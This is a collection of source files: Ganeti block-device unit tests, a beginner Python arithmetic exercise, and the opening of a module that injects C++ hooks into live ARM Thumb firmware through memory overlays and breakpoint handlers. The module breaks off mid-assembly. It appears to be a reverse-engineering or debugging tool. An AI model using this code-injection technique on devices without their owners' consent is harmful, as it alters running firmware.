"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Hy",
"bytes": "691"
},
{
"name": "Python",
"bytes": "124594"
}
],
"symlink_target": ""
} |
"""Script for unittesting the bdev module"""
import os
import random
import unittest
from ganeti import compat
from ganeti import constants
from ganeti import errors
from ganeti import objects
from ganeti import utils
from ganeti.storage import bdev
import testutils
def _FakeRunCmd(success, stdout, cmd):
if success:
exit_code = 0
else:
exit_code = 1
return utils.RunResult(exit_code, None, stdout, "", cmd,
utils.process._TIMEOUT_NONE, 5)
class FakeStatResult(object):
def __init__(self, st_mode):
self.st_mode = st_mode
self.st_rdev = 0
class TestRADOSBlockDevice(testutils.GanetiTestCase):
"""Tests for bdev.RADOSBlockDevice volumes
"""
def setUp(self):
"""Set up input data"""
testutils.GanetiTestCase.setUp(self)
self.plain_output_old_ok = \
testutils.ReadTestData("bdev-rbd/plain_output_old_ok.txt")
self.plain_output_old_no_matches = \
testutils.ReadTestData("bdev-rbd/plain_output_old_no_matches.txt")
self.plain_output_old_extra_matches = \
testutils.ReadTestData("bdev-rbd/plain_output_old_extra_matches.txt")
self.plain_output_old_empty = \
testutils.ReadTestData("bdev-rbd/plain_output_old_empty.txt")
self.plain_output_new_ok = \
testutils.ReadTestData("bdev-rbd/plain_output_new_ok.txt")
self.plain_output_new_no_matches = \
testutils.ReadTestData("bdev-rbd/plain_output_new_no_matches.txt")
self.plain_output_new_extra_matches = \
testutils.ReadTestData("bdev-rbd/plain_output_new_extra_matches.txt")
# This file is completely empty, and as such it's not shipped.
self.plain_output_new_empty = ""
self.json_output_ok = testutils.ReadTestData("bdev-rbd/json_output_ok.txt")
self.json_output_no_matches = \
testutils.ReadTestData("bdev-rbd/json_output_no_matches.txt")
self.json_output_extra_matches = \
testutils.ReadTestData("bdev-rbd/json_output_extra_matches.txt")
self.json_output_empty = \
testutils.ReadTestData("bdev-rbd/json_output_empty.txt")
self.output_invalid = testutils.ReadTestData("bdev-rbd/output_invalid.txt")
self.volume_name = "d7ab910a-4933-4ffe-88d0-faf2ce31390a.rbd.disk0"
self.test_unique_id = ("rbd", self.volume_name)
self.test_params = {
constants.LDP_POOL: "fake_pool"
}
def testParseRbdShowmappedJson(self):
parse_function = bdev.RADOSBlockDevice._ParseRbdShowmappedJson
self.assertEqual(parse_function(self.json_output_ok, self.volume_name),
"/dev/rbd3")
self.assertEqual(parse_function(self.json_output_empty, self.volume_name),
None)
self.assertEqual(parse_function(self.json_output_no_matches,
self.volume_name), None)
self.assertRaises(errors.BlockDeviceError, parse_function,
self.json_output_extra_matches, self.volume_name)
self.assertRaises(errors.BlockDeviceError, parse_function,
self.output_invalid, self.volume_name)
def testParseRbdShowmappedPlain(self):
parse_function = bdev.RADOSBlockDevice._ParseRbdShowmappedPlain
self.assertEqual(parse_function(self.plain_output_new_ok,
self.volume_name), "/dev/rbd3")
self.assertEqual(parse_function(self.plain_output_old_ok,
self.volume_name), "/dev/rbd3")
self.assertEqual(parse_function(self.plain_output_new_empty,
self.volume_name), None)
self.assertEqual(parse_function(self.plain_output_old_empty,
self.volume_name), None)
self.assertEqual(parse_function(self.plain_output_new_no_matches,
self.volume_name), None)
self.assertEqual(parse_function(self.plain_output_old_no_matches,
self.volume_name), None)
self.assertRaises(errors.BlockDeviceError, parse_function,
self.plain_output_new_extra_matches, self.volume_name)
self.assertRaises(errors.BlockDeviceError, parse_function,
self.plain_output_old_extra_matches, self.volume_name)
self.assertRaises(errors.BlockDeviceError, parse_function,
self.output_invalid, self.volume_name)
@testutils.patch_object(utils, "RunCmd")
@testutils.patch_object(bdev.RADOSBlockDevice, "_UnmapVolumeFromBlockdev")
@testutils.patch_object(bdev.RADOSBlockDevice, "Attach")
def testRADOSBlockDeviceImport(self, attach_mock, unmap_mock, run_cmd_mock):
"""Test for bdev.RADOSBlockDevice.Import()"""
# Set up the mock objects return values
attach_mock.return_value = True
run_cmd_mock.return_value = _FakeRunCmd(True, "", "")
# Create a fake rbd volume
inst = bdev.RADOSBlockDevice(self.test_unique_id, [], 1024,
self.test_params, {})
# Desired output command
import_cmd = [constants.RBD_CMD, "import",
"-p", inst.rbd_pool,
"-", inst.rbd_name]
self.assertEqual(inst.Import(), import_cmd)
@testutils.patch_object(bdev.RADOSBlockDevice, "Attach")
def testRADOSBlockDeviceExport(self, attach_mock):
"""Test for bdev.RADOSBlockDevice.Export()"""
# Set up the mock object return value
attach_mock.return_value = True
# Create a fake rbd volume
inst = bdev.RADOSBlockDevice(self.test_unique_id, [], 1024,
self.test_params, {})
# Desired output command
export_cmd = [constants.RBD_CMD, "export",
"-p", inst.rbd_pool,
inst.rbd_name, "-"]
self.assertEqual(inst.Export(), export_cmd)
@testutils.patch_object(utils, "RunCmd")
@testutils.patch_object(bdev.RADOSBlockDevice, "Attach")
def testRADOSBlockDeviceCreate(self, attach_mock, run_cmd_mock):
"""Test for bdev.RADOSBlockDevice.Create() success"""
attach_mock.return_value = True
# This returns a successful RunCmd result
run_cmd_mock.return_value = _FakeRunCmd(True, "", "")
expect = bdev.RADOSBlockDevice(self.test_unique_id, [], 1024,
self.test_params, {})
got = bdev.RADOSBlockDevice.Create(self.test_unique_id, [], 1024, None,
self.test_params, False, {},
test_kwarg="test")
self.assertEqual(expect, got)
@testutils.patch_object(bdev.RADOSBlockDevice, "Attach")
def testRADOSBlockDeviceCreateFailure(self, attach_mock):
"""Test for bdev.RADOSBlockDevice.Create() failure with exclusive_storage
enabled
"""
attach_mock.return_value = True
self.assertRaises(errors.ProgrammerError, bdev.RADOSBlockDevice.Create,
self.test_unique_id, [], 1024, None, self.test_params,
True, {})
@testutils.patch_object(bdev.RADOSBlockDevice, "_MapVolumeToBlockdev")
@testutils.patch_object(os, "stat")
def testAttach(self, stat_mock, map_mock):
"""Test for bdev.RADOSBlockDevice.Attach()"""
stat_mock.return_value = FakeStatResult(0x6000) # bitmask for S_ISBLK
map_mock.return_value = "/fake/path"
dev = bdev.RADOSBlockDevice.__new__(bdev.RADOSBlockDevice)
dev.unique_id = self.test_unique_id
self.assertEqual(dev.Attach(), True)
@testutils.patch_object(bdev.RADOSBlockDevice, "_MapVolumeToBlockdev")
@testutils.patch_object(os, "stat")
def testAttachFailureNotBlockdev(self, stat_mock, map_mock):
"""Test for bdev.RADOSBlockDevice.Attach() failure, not a blockdev"""
stat_mock.return_value = FakeStatResult(0x0)
map_mock.return_value = "/fake/path"
dev = bdev.RADOSBlockDevice.__new__(bdev.RADOSBlockDevice)
dev.unique_id = self.test_unique_id
self.assertEqual(dev.Attach(), False)
@testutils.patch_object(bdev.RADOSBlockDevice, "_MapVolumeToBlockdev")
@testutils.patch_object(os, "stat")
def testAttachFailureNoDevice(self, stat_mock, map_mock):
"""Test for bdev.RADOSBlockDevice.Attach() failure, no device found"""
stat_mock.side_effect = OSError("No device found")
map_mock.return_value = "/fake/path"
dev = bdev.RADOSBlockDevice.__new__(bdev.RADOSBlockDevice)
dev.unique_id = self.test_unique_id
self.assertEqual(dev.Attach(), False)
class TestExclusiveStoragePvs(unittest.TestCase):
"""Test cases for functions dealing with LVM PV and exclusive storage"""
# Allowance for rounding
_EPS = 1e-4
_MARGIN = constants.PART_MARGIN + constants.PART_RESERVED + _EPS
@staticmethod
def _GenerateRandomPvInfo(rnd, name, vg):
# Granularity is .01 MiB
size = rnd.randint(1024 * 100, 10 * 1024 * 1024 * 100)
if rnd.choice([False, True]):
free = float(rnd.randint(0, size)) / 100.0
else:
free = float(size) / 100.0
size = float(size) / 100.0
attr = "a-"
return objects.LvmPvInfo(name=name, vg_name=vg, size=size, free=free,
attributes=attr)
def testGetStdPvSize(self):
"""Test cases for bdev.LogicalVolume._GetStdPvSize()"""
rnd = random.Random(9517)
for _ in range(0, 50):
# Identical volumes
pvi = self._GenerateRandomPvInfo(rnd, "disk", "myvg")
onesize = bdev.LogicalVolume._GetStdPvSize([pvi])
self.assertTrue(onesize <= pvi.size)
self.assertTrue(onesize > pvi.size * (1 - self._MARGIN))
for length in range(2, 10):
n_size = bdev.LogicalVolume._GetStdPvSize([pvi] * length)
self.assertEqual(onesize, n_size)
# Mixed volumes
for length in range(1, 10):
pvlist = [self._GenerateRandomPvInfo(rnd, "disk", "myvg")
for _ in range(0, length)]
std_size = bdev.LogicalVolume._GetStdPvSize(pvlist)
self.assertTrue(compat.all(std_size <= pvi.size for pvi in pvlist))
self.assertTrue(compat.any(std_size > pvi.size * (1 - self._MARGIN)
for pvi in pvlist))
pvlist.append(pvlist[0])
p1_size = bdev.LogicalVolume._GetStdPvSize(pvlist)
self.assertEqual(std_size, p1_size)
def testComputeNumPvs(self):
"""Test cases for bdev.LogicalVolume._ComputeNumPvs()"""
rnd = random.Random(8067)
for _ in range(0, 1000):
pvlist = [self._GenerateRandomPvInfo(rnd, "disk", "myvg")]
lv_size = float(rnd.randint(10 * 100, 1024 * 1024 * 100)) / 100.0
num_pv = bdev.LogicalVolume._ComputeNumPvs(lv_size, pvlist)
std_size = bdev.LogicalVolume._GetStdPvSize(pvlist)
self.assertTrue(num_pv >= 1)
self.assertTrue(num_pv * std_size >= lv_size)
self.assertTrue((num_pv - 1) * std_size < lv_size * (1 + self._EPS))
def testGetEmptyPvNames(self):
"""Test cases for bdev.LogicalVolume._GetEmptyPvNames()"""
rnd = random.Random(21126)
for _ in range(0, 100):
num_pvs = rnd.randint(1, 20)
pvlist = [self._GenerateRandomPvInfo(rnd, "disk%d" % n, "myvg")
for n in range(0, num_pvs)]
for num_req in range(1, num_pvs + 2):
epvs = bdev.LogicalVolume._GetEmptyPvNames(pvlist, num_req)
epvs_set = compat.UniqueFrozenset(epvs)
if len(epvs) > 1:
self.assertEqual(len(epvs), len(epvs_set))
for pvi in pvlist:
if pvi.name in epvs_set:
self.assertEqual(pvi.size, pvi.free)
else:
# There should be no remaining empty PV when less than the
# requeste number of PVs has been returned
self.assertTrue(len(epvs) == num_req or pvi.free != pvi.size)
class TestLogicalVolume(testutils.GanetiTestCase):
"""Tests for bdev.LogicalVolume."""
def setUp(self):
"""Set up test data"""
testutils.GanetiTestCase.setUp(self)
self.volume_name = "31225655-5775-4356-c212-e8b1e137550a.disk0"
self.test_unique_id = ("ganeti", self.volume_name)
self.test_params = {
constants.LDP_STRIPES: 1
}
self.pv_info_return = [objects.LvmPvInfo(name="/dev/sda5", vg_name="xenvg",
size=3500000.00, free=5000000.00,
attributes="wz--n-", lv_list=[])]
self.pv_info_invalid = [objects.LvmPvInfo(name="/dev/s:da5",
vg_name="xenvg",
size=3500000.00, free=5000000.00,
attributes="wz--n-", lv_list=[])]
self.pv_info_no_space = [objects.LvmPvInfo(name="/dev/sda5", vg_name="xenvg",
size=3500000.00, free=0.00,
attributes="wz--n-", lv_list=[])]
def testParseLvInfoLine(self):
"""Tests for LogicalVolume._ParseLvInfoLine."""
broken_lines = [
" toomuch#devpath#-wi-ao#253#3#4096.00#2#/dev/abc(20)",
" devpath#-wi-ao#253#3#4096.00#/dev/abc(20)",
" devpath#-wi-a#253#3#4096.00#2#/dev/abc(20)",
" devpath#-wi-ao#25.3#3#4096.00#2#/dev/abc(20)",
" devpath#-wi-ao#twenty#3#4096.00#2#/dev/abc(20)",
" devpath#-wi-ao#253#3.1#4096.00#2#/dev/abc(20)",
" devpath#-wi-ao#253#three#4096.00#2#/dev/abc(20)",
" devpath#-wi-ao#253#3#four#2#/dev/abc(20)",
" devpath#-wi-ao#253#3#4096..00#2#/dev/abc(20)",
" devpath#-wi-ao#253#3#4096.00#2.0#/dev/abc(20)",
" devpath#-wi-ao#253#3#4096.00#two#/dev/abc(20)",
" devpath#-wi-ao#253#3#4096.00#2#/dev/abc20",
]
for broken in broken_lines:
self.assertRaises(errors.BlockDeviceError,
bdev.LogicalVolume._ParseLvInfoLine, broken, "#")
# Examples of good lines from "lvs":
#
# /dev/something|-wi-ao|253|3|4096.00|2|/dev/sdb(144),/dev/sdc(0)
# /dev/somethingelse|-wi-a-|253|4|4096.00|1|/dev/sdb(208)
true_out = [
("/dev/path", ("-wi-ao", 253, 3, 4096.00, 2, ["/dev/abc"])),
("/dev/path", ("-wi-a-", 253, 7, 4096.00, 4, ["/dev/abc"])),
("/dev/path", ("-ri-a-", 253, 4, 4.00, 5, ["/dev/abc", "/dev/def"])),
("/dev/path", ("-wc-ao", 15, 18, 4096.00, 32,
["/dev/abc", "/dev/def", "/dev/ghi0"])),
# Physical devices might be missing with thin volumes
("/dev/path", ("twc-ao", 15, 18, 4096.00, 32, [])),
]
for exp in true_out:
for sep in "#;|":
devpath = exp[0]
lvs = exp[1]
pvs = ",".join("%s(%s)" % (d, i * 12) for (i, d) in enumerate(lvs[-1]))
lvs_line = (sep.join((" %s", "%s", "%d", "%d", "%.2f", "%d", "%s")) %
((devpath,) + lvs[0:-1] + (pvs,)))
parsed = bdev.LogicalVolume._ParseLvInfoLine(lvs_line, sep)
self.assertEqual(parsed, exp)
def testGetLvGlobalInfo(self):
"""Tests for LogicalVolume._GetLvGlobalInfo."""
good_lines="/dev/1|-wi-ao|253|3|4096.00|2|/dev/sda(20)\n" \
"/dev/2|-wi-ao|253|3|4096.00|2|/dev/sda(21)\n"
expected_output = {"/dev/1": ("-wi-ao", 253, 3, 4096, 2, ["/dev/sda"]),
"/dev/2": ("-wi-ao", 253, 3, 4096, 2, ["/dev/sda"])}
self.assertEqual({},
bdev.LogicalVolume._GetLvGlobalInfo(
_run_cmd=lambda cmd: _FakeRunCmd(False,
"Fake error msg",
cmd)))
self.assertEqual({},
bdev.LogicalVolume._GetLvGlobalInfo(
_run_cmd=lambda cmd: _FakeRunCmd(True,
"",
cmd)))
self.assertRaises(errors.BlockDeviceError,
bdev.LogicalVolume._GetLvGlobalInfo,
_run_cmd=lambda cmd: _FakeRunCmd(True, "BadStdOut", cmd))
fake_cmd = lambda cmd: _FakeRunCmd(True, good_lines, cmd)
good_res = bdev.LogicalVolume._GetLvGlobalInfo(_run_cmd=fake_cmd)
self.assertEqual(expected_output, good_res)
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testLogicalVolumeImport(self, attach_mock):
"""Tests for bdev.LogicalVolume.Import()"""
# Set up the mock object return value
attach_mock.return_value = True
# Create a fake logical volume
inst = bdev.LogicalVolume(self.test_unique_id, [], 1024, {}, {})
# Desired output command
import_cmd = [constants.DD_CMD,
"of=%s" % inst.dev_path,
"bs=%s" % constants.DD_BLOCK_SIZE,
"oflag=direct", "conv=notrunc"]
self.assertEqual(inst.Import(), import_cmd)
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testLogicalVolumeExport(self, attach_mock):
"""Test for bdev.LogicalVolume.Export()"""
# Set up the mock object return value
attach_mock.return_value = True
# Create a fake logical volume
inst = bdev.LogicalVolume(self.test_unique_id, [], 1024, {}, {})
# Desired output command
export_cmd = [constants.DD_CMD,
"if=%s" % inst.dev_path,
"bs=%s" % constants.DD_BLOCK_SIZE,
"count=%s" % inst.size,
"iflag=direct"]
self.assertEqual(inst.Export(), export_cmd)
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(utils, "RunCmd")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testCreate(self, attach_mock, run_cmd_mock, pv_info_mock):
"""Test for bdev.LogicalVolume.Create() success"""
attach_mock.return_value = True
# This returns a successful RunCmd result
run_cmd_mock.return_value = _FakeRunCmd(True, "", "")
pv_info_mock.return_value = self.pv_info_return
expect = bdev.LogicalVolume(self.test_unique_id, [], 1024,
self.test_params, {})
got = bdev.LogicalVolume.Create(self.test_unique_id, [], 1024, None,
self.test_params, False, {},
test_kwarg="test")
self.assertEqual(expect, got)
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testCreateFailurePvsInfoExclStor(self, attach_mock, pv_info_mock):
"""Test for bdev.LogicalVolume.Create() failure when pv_info is empty and
exclusive storage is enabled
"""
attach_mock.return_value = True
pv_info_mock.return_value = []
self.assertRaises(errors.BlockDeviceError, bdev.LogicalVolume.Create,
self.test_unique_id, [], 1024, None, {}, True, {})
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testCreateFailurePvsInfoNoExclStor(self, attach_mock, pv_info_mock):
"""Test for bdev.LogicalVolume.Create() failure when pv_info is empty and
exclusive storage is disabled
"""
attach_mock.return_value = True
pv_info_mock.return_value = []
self.assertRaises(errors.BlockDeviceError, bdev.LogicalVolume.Create,
self.test_unique_id, [], 1024, None, {}, False, {})
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testCreateFailurePvsInvalid(self, attach_mock, pv_info_mock):
"""Test for bdev.LogicalVolume.Create() failure when pvs_info output is
invalid
"""
attach_mock.return_value = True
pv_info_mock.return_value = self.pv_info_invalid
self.assertRaises(errors.BlockDeviceError, bdev.LogicalVolume.Create,
self.test_unique_id, [], 1024, None, {}, False, {})
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testCreateFailureNoSpindles(self, attach_mock, pv_info_mock):
"""Test for bdev.LogicalVolume.Create() failure when there are no spindles
"""
attach_mock.return_value = True
pv_info_mock.return_value = self.pv_info_return
self.assertRaises(errors.BlockDeviceError, bdev.LogicalVolume.Create,
self.test_unique_id, [], 1024, None,
self.test_params,True, {})
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testCreateFailureNotEnoughSpindles(self, attach_mock, pv_info_mock):
"""Test for bdev.LogicalVolume.Create() failure when there are not enough
spindles
"""
attach_mock.return_value = True
pv_info_mock.return_value = self.pv_info_return
self.assertRaises(errors.BlockDeviceError, bdev.LogicalVolume.Create,
self.test_unique_id, [], 1024, 0,
self.test_params, True, {})
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testCreateFailureNotEnoughEmptyPvs(self, attach_mock, pv_info_mock):
"""Test for bdev.LogicalVolume.Create() failure when there are not enough
empty pvs
"""
attach_mock.return_value = True
pv_info_mock.return_value = self.pv_info_return
self.assertRaises(errors.BlockDeviceError, bdev.LogicalVolume.Create,
self.test_unique_id, [], 1024, 2,
self.test_params, True, {})
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testCreateFailureNoFreeSpace(self, attach_mock, pv_info_mock):
"""Test for bdev.LogicalVolume.Create() failure when there is no free space
"""
attach_mock.return_value = True
pv_info_mock.return_value = self.pv_info_no_space
self.assertRaises(errors.BlockDeviceError, bdev.LogicalVolume.Create,
self.test_unique_id, [], 1024, None,
self.test_params, False, {})
@testutils.patch_object(utils, "RunCmd")
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testCreateFailureCommand(self, attach_mock, pv_info_mock, run_cmd_mock):
"""Test for bdev.LogicalVolume.Create() failure when the runcmd is incorrect
"""
attach_mock.return_value = True
pv_info_mock.return_value = self.pv_info_return
run_cmd_mock = _FakeRunCmd(False, "", "")
self.assertRaises(errors.BlockDeviceError, bdev.LogicalVolume.Create,
self.test_unique_id, [], 1024, None,
self.test_params, False, {})
@testutils.patch_object(bdev.LogicalVolume, "_GetLvGlobalInfo")
def testAttach(self, info_mock):
"""Test for bdev.LogicalVolume.Attach()"""
info_mock.return_value = {"/dev/fake/path": ("v", 1, 0, 1024, 0, ["test"])}
dev = bdev.LogicalVolume.__new__(bdev.LogicalVolume)
dev.dev_path = "/dev/fake/path"
self.assertEqual(dev.Attach(), True)
@testutils.patch_object(bdev.LogicalVolume, "_GetLvGlobalInfo")
def testAttachFalse(self, info_mock):
"""Test for bdev.LogicalVolume.Attach() with missing lv_info"""
info_mock.return_value = {}
dev = bdev.LogicalVolume.__new__(bdev.LogicalVolume)
dev.dev_path = "/dev/fake/path"
self.assertEqual(dev.Attach(), False)
class TestPersistentBlockDevice(testutils.GanetiTestCase):
"""Tests for bdev.PersistentBlockDevice volumes
"""
def setUp(self):
"""Set up test data"""
testutils.GanetiTestCase.setUp(self)
self.test_unique_id = (constants.BLOCKDEV_DRIVER_MANUAL, "/dev/abc")
def testPersistentBlockDeviceImport(self):
"""Test case for bdev.PersistentBlockDevice.Import()"""
# Create a fake block device
inst = bdev.PersistentBlockDevice(self.test_unique_id, [], 1024, {}, {})
self.assertRaises(errors.BlockDeviceError,
bdev.PersistentBlockDevice.Import, inst)
@testutils.patch_object(bdev.PersistentBlockDevice, "Attach")
def testCreate(self, attach_mock):
"""Test for bdev.PersistentBlockDevice.Create()"""
attach_mock.return_value = True
expect = bdev.PersistentBlockDevice(self.test_unique_id, [], 0, {}, {})
got = bdev.PersistentBlockDevice.Create(self.test_unique_id, [], 1024, None,
{}, False, {}, test_kwarg="test")
self.assertEqual(expect, got)
def testCreateFailure(self):
"""Test for bdev.PersistentBlockDevice.Create() failure"""
self.assertRaises(errors.ProgrammerError, bdev.PersistentBlockDevice.Create,
self.test_unique_id, [], 1024, None, {}, True, {})
@testutils.patch_object(os, "stat")
def testAttach(self, stat_mock):
"""Test for bdev.PersistentBlockDevice.Attach()"""
stat_mock.return_value = FakeStatResult(0x6000) # bitmask for S_ISBLK
dev = bdev.PersistentBlockDevice.__new__(bdev.PersistentBlockDevice)
dev.dev_path = "/dev/fake/path"
self.assertEqual(dev.Attach(), True)
@testutils.patch_object(os, "stat")
def testAttachFailureNotBlockdev(self, stat_mock):
"""Test for bdev.PersistentBlockDevice.Attach() failure, not a blockdev"""
stat_mock.return_value = FakeStatResult(0x0)
dev = bdev.PersistentBlockDevice.__new__(bdev.PersistentBlockDevice)
dev.dev_path = "/dev/fake/path"
self.assertEqual(dev.Attach(), False)
@testutils.patch_object(os, "stat")
def testAttachFailureNoDevice(self, stat_mock):
"""Test for bdev.PersistentBlockDevice.Attach() failure, no device found"""
stat_mock.side_effect = OSError("No device found")
dev = bdev.PersistentBlockDevice.__new__(bdev.PersistentBlockDevice)
dev.dev_path = "/dev/fake/path"
self.assertEqual(dev.Attach(), False)
if __name__ == "__main__":
testutils.GanetiTestProgram()
| {
"content_hash": "0e2f708c37343179a2d06c14107bf691",
"timestamp": "",
"source": "github",
"line_count": 620,
"max_line_length": 81,
"avg_line_length": 41.248387096774195,
"alnum_prop": 0.6298584499882693,
"repo_name": "leshchevds/ganeti",
"id": "a894e8fd641557ea7572e98f29e6f730e8637be4",
"size": "26962",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/py/ganeti.storage.bdev_unittest.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "Haskell",
"bytes": "2664853"
},
{
"name": "JavaScript",
"bytes": "8855"
},
{
"name": "M4",
"bytes": "32087"
},
{
"name": "Makefile",
"bytes": "97737"
},
{
"name": "Python",
"bytes": "6099533"
},
{
"name": "Shell",
"bytes": "122593"
}
],
"symlink_target": ""
} |
cars = 100
space_in_a_car = 4
drivers = 30
passengers = 90
cars_not_driven = cars - drivers
cars_driven = drivers
carpool_capacity = cars_driven * space_in_a_car
average_passengers_per_car = passengers / cars_driven
print("There are {0} cars available.".format(cars))
print("There are only {0} drivers available.".format(drivers))
print("There will be {0} empty cars today.".format(cars_not_driven))
print("We can transport {0} people today.".format(carpool_capacity))
print("We have {0} to carpool today.".format(carpool_capacity))
print("we need to put about {0} passengers in each car.".format(average_passengers_per_car))
| {
"content_hash": "767ebae09c019014b295ece70bbd118a",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 92,
"avg_line_length": 39.25,
"alnum_prop": 0.7372611464968153,
"repo_name": "eilinx/lpthw",
"id": "ca22991f54cd503afa75c65db98b37ca7c0bf451",
"size": "653",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ex4.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "24881"
}
],
"symlink_target": ""
} |
__all__ = [ 'overlay_hook' ]
from code import *
from dump import *
from mem import *
includes['hook'] = '#include "hook.h"'
defines['hook_stack_lines'] = 8
defines['hook_show_stack'] = True
defines['hook_show_registers'] = True
defines['hook_show_timestamp'] = True
defines['hook_show_message'] = True
def overlay_hook(d, hook_address, handler,
includes = includes, defines = defines,
handler_address = pad, va = 0x500000, verbose = False,
replace_one_instruction = False, reset = False,
target_already_mapped = False,
show_asm_diff = False
):
"""Inject a C++ hook into Thumb code executing from Flash memory.
All registers are bridged bi-directionally to C++ variables in the hook.
"""
if hook_address & 1:
raise ValueError("Hook address must be halfword aligned")
# Steps to make this crazy thing work:
#
# - Map some movable RAM over the part of flash we're hooking
# - That RAM is has a software interrupt instruction in it
# - We have our own handler in RAM, patched into the vector table
# - That handler cleans up the mess from our hook, and calls C++ code
# - The C++ code accesses its registers via a saved copy on the stack
# - The handler returns, and the hooked code continues on its way.
#
# Actually, we do this in a slightly different order.
#
# - Compile the C++ code first, since we want to report errors quickly
# - Actually we'll set this all up behind the scenes then instantly
# turn on the overlay mapping. That should make it relatively save
# to use this on live code, which we will be.
handler_data = compile_string(handler_address, """{
uint32_t* regs = (uint32_t*) arg;
%s // Alias array to r0-15
uint32_t& ip = r12; // Additional names for r12-r15
uint32_t& sp = r13;
uint32_t& lr = r14;
uint32_t& pc = r15;
uint32_t& cpsr = regs[-1];
{ %s; } // Handler block, with one free semicolon
0; // Unused return value for r0
}""" % (
''.join( 'uint32_t& r%d = regs[%d];\n' % (i,i) for i in range(16) ),
handler
),
# This compile inherits variables and blocks from the shell
includes = includes, defines = defines)
# Reset only after we know the compile is good
if reset:
reset_arm(d)
handler_len = len(handler_data)
poke_words_from_string(d, handler_address, handler_data)
# The hook location doesn't have to be word aligned, but the overlay
# does. So, keep track of where the ovl starts. For simplicity, we
# always make the overlay the same size, 8 bytes.
ovl_address = hook_address & ~3
ovl_size = 8
# That overlay is mostly a copy of the data we're covering up.
# Position the overlay away from flash, so we get a clean copy.
# Then read and disassemble it, starting the disassembly at the hook address.
if not target_already_mapped:
overlay_set(d, va, ovl_size)
ovl_data = read_block(d, ovl_address, ovl_size)
ovl_asm = disassemble_string(ovl_data[hook_address - ovl_address:], address=hook_address)
ovl_asm_lines = disassembly_lines(ovl_asm)
# The next instruction is where we return from the hook.
# Fill the entire instruction we're replacing (2 or 4 bytes)
# with an arbitrary breakpoint we'll use to enter our ISR.
#
# We use a bkpt instead of svc for a subtle but critical
# reason- most of the code here seems to be in svc mode
# already, and this architecture requires software support
# for nesting svc's. Our hook would need to be much bigger
# to include push/pop instructions, yuck.
#
# Right now we use an arbitrary number as the only bkpt code
# and never check this in the handler. This could be used
# to identify one of several hooks in the future.
return_address = ovl_asm_lines[1].address
hook_instruction_size = return_address - hook_address
patched_ovl_data = (
ovl_data[:hook_address - ovl_address] +
b'\xbe' * hook_instruction_size +
ovl_data[return_address - ovl_address:]
)
# Our overlay is complete, store it to RAM while it's mapped to our temp VA
if not target_already_mapped:
poke_words(d, va, words_from_string(patched_ovl_data))
# Now back to the instruction we're replacing...
# PC-relative loads are common enough that we try to fix them up. A lot of things
# are too much trouble to relocate, though, and we'll throw up a NotImplementedError.
reloc = ovl_asm_lines[0]
reloc_ldr_word = ldrpc_source_word(d, reloc)
if replace_one_instruction:
# We want to replace one instruction with the C++ function, which it turns
# out is exactly what we do if we omit the relocation entirely.
reloc = ''
elif reloc.op == 'bl':
# Calls are a really special case! We can handle them, but they
# require a different strategy than other instructions. For most
# instructions we use r12 to store the address of our scratchpad
# across stacks, which works fine for thumb code. But calls can invoke
# ARM code that trashes r12, and in fact this is very common because
# of how switch statements are often implemented.
#
# But good news! If this function respects the ARM procedure call
# standard, which the code we have seems to, we can use any of r4-r8
# to save r12 and the called function will preserve it for us.
reloc = """
mov r8, r12
%s
mov r12, r8
""" % reloc
elif reloc_ldr_word is not None:
# Relocate to the assembler's automatic constant pool
reloc.args = reloc.args.split(',')[0] + ', =0x%08x' % reloc_ldr_word
elif reloc.op.startswith('b') and not reloc.op.startswith('bic'):
raise NotImplementedError("Can't hook branches yet: %s" % reloc)
elif reloc.args.find('pc') > 0:
raise NotImplementedError("Can't hook instructions that read or write pc: %s" % reloc)
# The ISR lives just after the handler, in RAM. It includes:
#
# - Register save/restore
# - Invoking the C++ hook function with a nice flat regs[] array
# - A relocated copy of the instruction we replaced with the bkpt
# - Returning to the right address after the hook
isr_address = (handler_address + handler_len + 0x1f) & ~0x1f
isr_len = assemble(d, isr_address, """
@ Save state and lay out the stack:
@
@ [sp, #72+4*13] pc
@ [sp, #72+4*12] r12
@ ... ...
@ [sp, #72+4*1] r1
@ [sp, #72+4*0] r0
@ [sp, #8+4*15] regs[15] / r15 (pc)
@ [sp, #8+4*14] regs[14] / r14 (lr)
@ [sp, #8+4*13] regs[13] / r13 (sp)
@ [sp, #8+4*12] regs[12] / r12
@ ... ...
@ [sp, #8+4*2] regs[ 2] / r2
@ [sp, #8+4*1] regs[ 1] / r1
@ [sp, #8+4*0] regs[ 0] / r0
@ [sp, #4] regs[-1] / cpsr
@ [sp, #0] regs[-2] / breakpoint_psr
@
@ This is a little wasteful of stack RAM, but it makes the layout as
@ convenient as possible for the C++ code by keeping its registers in
@ order.
push {r0-r12, lr} @ Save everything except {sp, pc}
push {r0-r2} @ Placeholders for regs[13] through regs[15]
push {r0-r12} @ Initial value for regs[0] through regs[12]
mrs r11, spsr @ Saved psr, becomes regs[-1]
mrs r10, cpsr @ Also save handler's cpsr to regs[-2]
push {r10-r11} @ (we needed 8-byte alignment anyway)
@ Patch correct values into regs[].
@
@ At this point r0-r12 are fine (assuming we don't care about r8-r12
